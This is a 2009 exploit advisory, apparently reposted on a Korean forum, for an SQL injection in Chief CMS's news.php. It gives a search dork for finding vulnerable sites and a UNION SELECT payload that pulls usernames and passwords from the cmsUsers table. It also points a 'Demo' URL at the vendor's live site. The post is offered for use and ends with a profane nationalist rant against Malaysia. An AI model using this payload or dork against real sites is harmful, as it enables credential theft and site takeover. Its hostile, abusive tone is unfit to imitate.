BACKRUSH  À¯´Ð½º¸í·É  ´ÙÀ½  ÀÚ·á½Ç  Ascii Table   ¿ø°ÝÁ¢¼Ó  ´Þ·Â,½Ã°£   ÇÁ·Î¼¼½º   ½©
ÁöÇÏö³ë¼±   RFC¹®¼­   SUN FAQ   SUN FAQ1   C¸Þ´º¾ó   PHP¸Þ´º¾ó   ³Ê±¸¸®   ¾Æ½ºÅ°¿ùµå ¾ÆÀÌÇǼ­Ä¡

±Û¾´ÀÌ: kaMtiEz Chief CMS SQL injection Á¶È¸¼ö: 12639

kamzcrew@yahoo.com
http://www.indonesiancoder.com

##############################################################
## Chief Content Management System - news.php?id= ##
## Author : kaMtiEz (kamzcrew@yahoo.com) ##
## Homepage : http://www.indonesiancoder.com ##
## Date : September 14, 2009 ##
##############################################################
/~~\__/~~\_/~~~~\_/~~\_______/~~\__________________/~~~~~\__
/~~\_/~~\___/~~\__/~~\_______/~~\_________________/~~\_/~~\_
/~~~~~\_____/~~\__/~~\_______/~~\_______/~~~~~~~\__/~~~~~\__
/~~\_/~~\___/~~\__/~~\_______/~~\____________________/~~\___
/~~\__/~~\_/~~~~\_/~~~~~~~~\_/~~~~~~~~\_____________/~~\____
____________________________________________________________
-=- KILL-9 CREW -=- INDONESIANCODER -=-

##############################################################

[ Software Information ]

[+] Vendor : http://www.chiefcms.com/
[+] Software : Chief Content Management System
[+] Vulnerability : SQL injection
[+] Dork : "Powered by The Chief"

##############################################################

[ Vulnerable File ]

http://127.0.0.1/news.php?id=[KILL-9 Crew SQLi]

[ Exploit ]

-666+union+select+1,2,3,4,5,6,concat_ws(0x3a,username,password)kaMtiEz,8,9,10,11,12,13,14,15,16,17+from+cmsUsers--

[ Demo ]

http://www.chiefcms.com/news.php?id=-666+union+select+1,2,3,4,5,6,concat_ws(0x3a,username,password)kaMtiEz,8,9,10,11,12,13,14,15,16,17+from+cmsUsers--

##############################################################

[ Thx TO ]

[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW
[+] Don Tukulesto,M3NW5,arianom,tiw0L,Pathloader,abah_benu,VycOd,och3_aneh
[+] Contrex,onthel,yasea,bugs,olivia,Jovan1,Aar,Ardy
[+] Coracore,black666girl,chitoz,NepT,ichal,tengik and YOU!!

[ NOTE ]

This is My birthday i am 18 !!


[ QUOTE ]

"Ini dadaku, mana dadamu?

Kalau Malaysia mau konfrontasi ekonomi, Mari kita hadapi dengan konfrontasi ekonomi
Kalau Malaysia mau konfrontasi politik, Mari kita hadapi dengan konfrontasi politik
Kalau Malaysia mau konfrontasi militer, Mari kita hadapi dengan konfrontasi militer

Soekarno, 1963¡±

Soekarno : Dengan ini saya menyatakan "GANYANG MALAYSIA"

FUCK MALAYSIA !!!

°ü·Ã±Û : ¾øÀ½ ±Û¾´½Ã°£ : 2009/09/15 8:41 from 125.161.199.92

  GET,POST method+iframe tag ¸ñ·Ïº¸±â »õ±Û ¾²±â Áö¿ì±â ÀÀ´ä±Û ¾²±â ±Û ¼öÁ¤ eNdonesia 8.3 (Publisher Module) SQL injection  
BACKRUSH  À¯´Ð½º¸í·É  ´ÙÀ½  ÀÚ·á½Ç  Ascii Table   ¿ø°ÝÁ¢¼Ó  ´Þ·Â,½Ã°£   ÇÁ·Î¼¼½º   ½©
ÁöÇÏö³ë¼±   RFC¹®¼­   SUN FAQ   SUN FAQ1   C¸Þ´º¾ó   PHP¸Þ´º¾ó   ³Ê±¸¸®   ¾Æ½ºÅ°¿ùµå ¾ÆÀÌÇǼ­Ä¡